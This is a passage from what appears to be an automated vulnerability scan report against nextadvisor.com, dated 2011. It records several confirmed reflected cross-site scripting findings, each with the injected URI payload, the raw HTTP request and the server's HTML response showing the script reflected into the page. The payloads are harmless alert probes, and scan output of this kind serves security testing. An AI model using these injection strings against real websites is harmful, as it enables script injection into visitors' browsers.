}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000144)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E

/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000147)</script>

Request

GET /index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000147)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3525
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/index.php'"--></style></script><script>netsparker(0x000147)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000147)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E

/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000177)</script>

Request

GET /audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/audiobooks/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6587
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", audiobooks, audio books, books on tape, books on CD, book downloads, audiobook downloads, mp3 books, Audible, Booksfree, eMusic Audiobooks, Simply Audiobooks, iTunes, Barnes & Noble" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/audiobooks/'"--></style></script><script>netsparker(0x000177)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start 
Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000177)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/audiobooks_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Audiobook Downloads and Rentals FAQ</h1> <p>Frequently Asked Questions about Audiobook Downloads and Rentals</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Audiobook Downloads and Rentals:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" 
value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="audiobooks"> <input type="hidden" name="FieldData4" 
..
- /audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E

/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetspar..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000178)</script>

Request

GET /audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/audiobooks/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6604
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", audiobooks, audio books, books on tape, books on CD, book downloads, audiobook downloads, mp3 books, Audible, Booksfree, eMusic Audiobooks, Simply Audiobooks, iTunes, Barnes & Noble" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/audiobooks/index.php'"--></style></script><script>netsparker(0x000178)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> 